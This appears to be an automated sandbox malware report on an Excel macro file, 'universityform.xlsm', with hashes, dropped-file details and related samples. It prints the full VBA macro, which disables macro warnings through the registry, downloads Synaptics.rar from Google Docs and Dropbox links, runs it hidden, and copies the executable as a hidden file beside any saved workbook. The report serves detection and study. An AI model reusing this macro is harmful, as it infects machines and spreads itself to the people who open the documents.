                            https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                            • 162.125.21.3
                            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.65.18
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 162.125.69.15
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 162.125.69.15
                            la.bot.mips.elfGet hashmaliciousMiraiBrowse
                            • 162.125.232.208
                            https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                            • 162.125.65.18
                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.69.18
                            slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.69.18
                            No context
                            No context
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1618
                            Entropy (8bit):2.6948490395023734
                            Encrypted:false
                            SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQ3fMQRgYOCE+E7UXOKI5KazYvKISmtzGm:YxAT+PFKUFM783fMQiYOSVIADK+GTzM
                            MD5:3FADF6724ED959BDF86B3E1E95826DE5
                            SHA1:425038B10743AB4302CF5B9422ADCC195408BA84
                            SHA-256:62E3203A060FE85E03628BF5620849F2ACCA50C561201262F6791C348C262BD6
                            SHA-512:AB16D0A837143CD5C2E34DD55D85CFDAF88770D93391A5DCA8308E620A55B5A88749CE552B36194C1DC5E44CC2D5B8B3D02633073C976E448D939645EAB06341
                            Malicious:false
                            Reputation:low
                            Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.3.6.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1618
                            Entropy (8bit):2.6948490395023734
                            Encrypted:false
                            SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQ3fMQRgYOCE+E7UXOKI5KazYvKISmtzGm:YxAT+PFKUFM783fMQiYOSVIADK+GTzM
                            MD5:3FADF6724ED959BDF86B3E1E95826DE5
                            SHA1:425038B10743AB4302CF5B9422ADCC195408BA84
                            SHA-256:62E3203A060FE85E03628BF5620849F2ACCA50C561201262F6791C348C262BD6
                            SHA-512:AB16D0A837143CD5C2E34DD55D85CFDAF88770D93391A5DCA8308E620A55B5A88749CE552B36194C1DC5E44CC2D5B8B3D02633073C976E448D939645EAB06341
                            Malicious:false
                            Reputation:low
                            Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.3.6.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):8.112143835430977E-5
                            Encrypted:false
                            SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                            MD5:AFDEAC461EEC32D754D8E6017E845D21
                            SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                            SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                            SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):71
                            Entropy (8bit):4.3462513114457515
                            Encrypted:false
                            SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                            MD5:8F4510F128F81A8BAF2A345D00F7E30C
                            SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                            SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                            SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with very long lines (28650), with CRLF line terminators
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.2069341302041854
                            Encrypted:false
                            SSDEEP:1536:SfBUwWH881fWB7NvgkjMH0+l/xrLKzq6TslquuLbM/rNKNvmNOErKXzxmEM4aHAW:EUHgB7Cg+lVLKV7t79cFMHBr
                            MD5:E248B42FFBA5F128884288497AC183A6
                            SHA1:303665233C81541D3E918BACAEF76578B449D42F
                            SHA-256:D226264663DB11313C60AC563F13C1F227462C723F57519981C7EEA072FA25FF
                            SHA-512:D92E34DB1A2297DC1E07C2E57E1E043D90F84D5F359241B9D624936A5C57C0AA674062CB12F7D64D1933FAE2348B728093BA78CB560CF374C101C533D83A5BD0
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/30/2024 10:05:33.410.EXCEL (0x1AB4).0x1C94.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-30T10:05:33.410Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-30T10:05:33.1295866Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-30T10:05:33.1295866Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-30T10:05:33.1295866Z\", \"C\" : \"\", \"Q\" : 42.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with very long lines (28821), with CRLF line terminators
                            Category:dropped
                            Size (bytes):343577
                            Entropy (8bit):5.0953452603409595
                            Encrypted:false
                            SSDEEP:1536:x+bAnI+Ds9Msp70o4MAg+aXbKT/wQ6rxrwU/unZOLjYm+TTANTEPgH/7yTVkrJnk:OAQp7ZAghr0/hwUa29cFMHb
                            MD5:297D10AFAAEC6935017400B241A3F6A6
                            SHA1:4E69765B38A5AFECC9C7EEE9B7FBBEDAF8887703
                            SHA-256:FE22FC892DFCB4C6E04339267B3EBDB43E386CF2AAAECE954C18714FAB6646AA
                            SHA-512:68DFB54C0D5651D591A7101A713416EBBF9B9574D1A9DBDE589C1A833FF99806232724BB467974A4D5D387EE09ED4AB9FF0B076B7DD14FBA6B82DC624B010CFA
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/30/2024 10:06:44.297.EXCEL (0x1F0C).0x1FBC.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":16,"Time":"2024-12-30T10:06:44.297Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-30T10:06:44.0630088Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-30T10:06:44.0630088Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-30T10:06:44.0630088Z\", \"C\" : \"\", \"Q\" : 6.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):32768
                            Entropy (8bit):3.865844544171653
                            Encrypted:false
                            SSDEEP:192:x41pkOwpYK3rcd5kM7ffi4UMEBQGOmS+BguAl09J4QfPmSKp4RFi++a+gmmI6tNs:W9ekfn0BxO0P79J7JKp2r+gmml3Yc
                            MD5:06DC8CF578D0F5E9E7737510F256B89D
                            SHA1:921145B81A09C15CCA73036315F572118908F130
                            SHA-256:0AEAA51B6C420FE9B623EB6517F7C1D7EE116D59520E53233648D781052A7FE8
                            SHA-512:75796CEBB4D6B0C18390BC161F2C912079AE061688BEDE70CAB522C6E5A059510211DC8EFA804BCB6775B8C0D2D3C5FF345FE72A55FC56384747F75A24DC655C
                            Malicious:false
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):21504
                            Entropy (8bit):5.318459459409671
                            Encrypted:false
                            SSDEEP:192:zK1pkOwpYK3rcd5kM7ffi4UMEBQGOmS+BguAl09J4QfPmSKp4RFi++a+gmmI6tNs:+9ekfn0BxO0P79J7JKp2r+gmml3Yc
                            MD5:DBCE0AFA72216E380779787CEBC96EAD
                            SHA1:933C77CCFA4A2D3BBE56691B9F418A2A3F4AE3D9
                            SHA-256:691458915300FFF09ADCC3AEFB988DFA3E45CB8B0B528CE2ED37ABC3F6684843
                            SHA-512:DD3088FF485D9EFEF939E2BCFE1944E088A131A8921ED75385CF4FC7DC93D06C54C528BE0A5C66954AADBD44CCAE3A53C48D7460289F39B40A1A1AE911261F1B
                            Malicious:false
                            Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!......................................................................................................................."...#...$...%...&...'...(...........................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):165
                            Entropy (8bit):1.4134958568691696
                            Encrypted:false
                            SSDEEP:3:D//nEwmM:DXEwmM
                            MD5:8B6F49EF043D1AF562C216108A13E0F2
                            SHA1:0106337F6D46E83B30CA7C1563C3FC3AF4209AF3
                            SHA-256:C80D5433620A06CF252C9489F9A46BA091A5DAA239AAC3A98DB918627DEFF314
                            SHA-512:241592FDA43D686AF92D22B2B451C51E70B742A5C33FA94307613155906396A53501E05719DD568C3D3C8088B95B83D7E98393B3692EB4B01907FE8BD927E896
                            Malicious:true
                            Preview:.user ..M.a.o.g.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            File type:Microsoft Excel 2007+
                            Entropy (8bit):7.918521920486396
                            TrID:
                            • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                            • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                            • ZIP compressed archive (8000/1) 8.38%
                            File name:universityform.xlsm
                            File size:94'222 bytes
                            MD5:d04491647385cc373152651890cbc6e0
                            SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
                            SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
                            SHA512:24912a2896f5a05b0d4e73740d27be623043b4ed23a30b50e75584250ecd0d50647eeeaacf6fb9fe9bfe06848e5ad435d647b01e2583796979a3aa77d769cad9
                            SSDEEP:1536:CguZCa6S5khUI6tHXchBmAXj4znOSjhLM+vGa/M1NIpPkUlB7583fjncFYIIrm0w:Cgugapkhl6tMaPjpM+d/Ms8ULavLcJ/
                            TLSH:9993F1778724791DE1A92C7BC03F6DB16528120C1F41FA8C6D4AF6CC7EDB6066A4ACC8
                            File Content Preview:PK..........!.w.6.............[Content_Types].xml ...(.........................................................................................................................................................................................................
                            Icon Hash:1d356664a4a09519
                            Document Type:OpenXML
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Author:RPC1
                            Last Saved By:Bruno
                            Create Time:2015-01-15T16:55:01Z
                            Last Saved Time:2024-12-30T21:22:32Z
                            Creating Application:Microsoft Excel
                            Security:0
                            Thumbnail Scaling Desired:false
                            Contains Dirty Links:false
                            Shared Document:false
                            Changed Hyperlinks:false
                            Application Version:16.0300
                            General
                            Stream Path:VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:11862
                            Data ASCII:. . . . . . . . . . . . . . . 8 . . . / . . . = . . . # . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . @ . . . I 9 P . 7 L S . F ' . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . O . . I - n n y . . . . . . . . . . . . . . . . . . . . . . x . . . . O . . I - n n y . I 9 P . 7 L S . F ' . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 0 . L . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . . . . . .
                            Data Raw:01 16 01 00 06 00 01 00 00 ec 0a 00 00 e4 00 00 00 38 02 00 00 2f 0b 00 00 3d 0b 00 00 91 23 00 00 0c 00 00 00 01 00 00 00 86 16 cf fa 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 9b c4 49 39 50 08 37 4c 83 53 bc 08 db 46 27 06 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            Dim SheetsChanged As Boolean
                            Dim SheetCount As Integer
                            
                            Private Sub Workbook_Open()
                              Dim i As Integer
                              For i = 1 To ActiveWorkbook.Sheets.Count
                                ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                              Next i
                              
                              RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
                              RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
                              
                              Application.DisplayAlerts = False
                              SheetCount = Worksheets.Count
                              
                              Call MPS
                              
                              ActiveWorkbook.Sheets(1).Select
                              SheetsChanged = False
                            End Sub
                            
                            Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              If Not SheetsChanged Then
                                ActiveWorkbook.Saved = True
                              End If
                            End Sub
                            
                            Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
                              SheetsChanged = True
                            End Sub
                            
                            Private Sub Workbook_NewSheet(ByVal Sh As Object)
                              SheetsChanged = True
                            End Sub
                            
                            Private Sub Workbook_SheetActivate(ByVal Sh As Object)
                              If ActiveWorkbook.Sheets.Count <> SheetCount Then
                                SheetsChanged = True
                                SheetCount = ActiveWorkbook.Sheets.Count
                              End If
                            End Sub
                            
                            Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
                              Dim i As Integer
                              Dim AIndex As Integer
                              Dim FName
                            
                              AIndex = ActiveWorkbook.ActiveSheet.Index
                            
                              If SaveAsUI = False Then
                                Cancel = True
                                Application.EnableEvents = False
                                Application.ScreenUpdating = False
                                
                                For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                  ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                Next i
                                ActiveWorkbook.Save
                                  
                                For i = 1 To ActiveWorkbook.Sheets.Count
                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                Next i
                                ActiveWorkbook.Sheets(AIndex).Select
                                SheetsChanged = False
                                
                                Application.ScreenUpdating = True
                                Application.EnableEvents = True
                              Else
                                Cancel = True
                                Application.EnableEvents = False
                                Application.ScreenUpdating = False
                                
                                For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                  ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                Next i
                                
                                FName = Application.GetSaveAsFilename(fileFilter:="Excel alma Kitab (*.xlsm), *.xlsm")
                                If FName <> False Then
                                  ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
                                  SaveAsInj ActiveWorkbook.Path
                                End If
                                
                                For i = 1 To ActiveWorkbook.Sheets.Count
                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                Next i
                                ActiveWorkbook.Sheets(AIndex).Select
                                SheetsChanged = False
                                    
                                Application.ScreenUpdating = True
                                Application.EnableEvents = True
                              End If
                            End Sub
                            
                            Sub SaveAsInj(DIR As String)
                              Dim FSO As Object
                              Dim FN As String
                              
                              Set FSO = CreateObject("scripting.filesystemobject")
                              FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              
                              If FSO.FileExists(FN) Then
                                If Not FSO.FileExists(DIR & "\~$cache1") Then
                                  FileCopy FN, DIR & "\~$cache1"
                                End If
                                SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
                              End If
                            End Sub
                            
                            Function RegKeyRead(i_RegKey As String) As String
                              Dim myWS As Object
                            
                              On Error Resume Next
                              Set myWS = CreateObject("WScript.Shell")
                              RegKeyRead = myWS.RegRead(i_RegKey)
                            End Function
                            
                            Function RegKeyExists(i_RegKey As String) As Boolean
                            Dim myWS As Object
                            
                              On Error GoTo ErrorHandler
                              Set myWS = CreateObject("WScript.Shell")
                              myWS.RegRead i_RegKey
                              RegKeyExists = True
                              Exit Function
                              
                            ErrorHandler:
                              RegKeyExists = False
                            End Function
                            
                            Sub RegKeySave(i_RegKey As String,                i_Value As String,       Optional i_Type As String = "REG_SZ")
                            Dim myWS As Object
                            
                              Set myWS = CreateObject("WScript.Shell")
                              myWS.RegWrite i_RegKey, i_Value, i_Type
                            End Sub
                            
                            Sub MPS()
                              Dim FSO As Object
                              Dim FP(1 To 3), TMP, URL(1 To 3) As String
                              
                              Set FSO = CreateObject("scripting.filesystemobject")
                              FP(1) = ActiveWorkbook.Path & "\~$cache1"
                              FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
                            
                              URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                              URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                              URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                              TMP = Environ("Temp") & "\~$cache1.exe"
                              
                              If FSO.FileExists(FP(1)) Then
                                If Not FSO.FileExists(TMP) Then
                                  FileCopy FP(1), TMP
                                End If
                                Shell TMP, vbHide
                              ElseIf FSO.FileExists(FP(2)) Then
                                If Not FSO.FileExists(TMP) Then
                                  FileCopy FP(2), TMP
                                End If
                                Shell TMP, vbHide
                              Else
                                If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                  Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                  Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                ElseIf Not FSO.FileExists(TMP) Then
                                  If FDW((URL(1)), (TMP)) Then
                                  ElseIf FDW((URL(2)), (TMP)) Then
                                  ElseIf FDW((URL(3)), (TMP)) Then
                                  End If
                                  If FSO.FileExists(TMP) Then
                                    Shell TMP, vbHide
                                  End If
                                Else
                                  Shell TMP, vbHide
                                End If
                                
                              End If
                              
                            End Sub
                            
                            Function FDW(MYU, NMA As String) As Boolean
                              Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              If WinHttpReq Is Nothing Then
                                Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              End If
                            
                              WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                              WinHttpReq.Option(6) = AllowRedirects
                              WinHttpReq.Open "GET", MYU, False
                              WinHttpReq.Send
                              
                              If (WinHttpReq.Status = 200) Then
                                If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
                                  FDW = True
                                  Set oStream = CreateObject("ADODB.Stream")
                                  oStream.Open
                                  oStream.Type = 1
                                  oStream.Write WinHttpReq.ResponseBody
                                  oStream.SaveToFile (NMA)
                                  oStream.Close
                                Else
                                   FDW = False
                                End If
                              Else
                                FDW = False
                              End If
                            End Function
                            
                            

                            General
                            Stream Path:PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:465
                            Entropy:5.186031070026395
                            Base64 Encoded:True
                            Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 C 4 E E 0 B 6 6 0 0 6 6 4 0 6 6 4 0 3 6 9 0 3 6 9 " . . D P B = " 9 8 9 A 3 4 5 B 5 1 5 B 5 1 A 4 A F 5 C 5 1 3 C 7 7 3 5 C E 9 A 0 A 4 9 5 E A 4 B 2 9 F 4 2 0 B 0 4 C 5 D 5
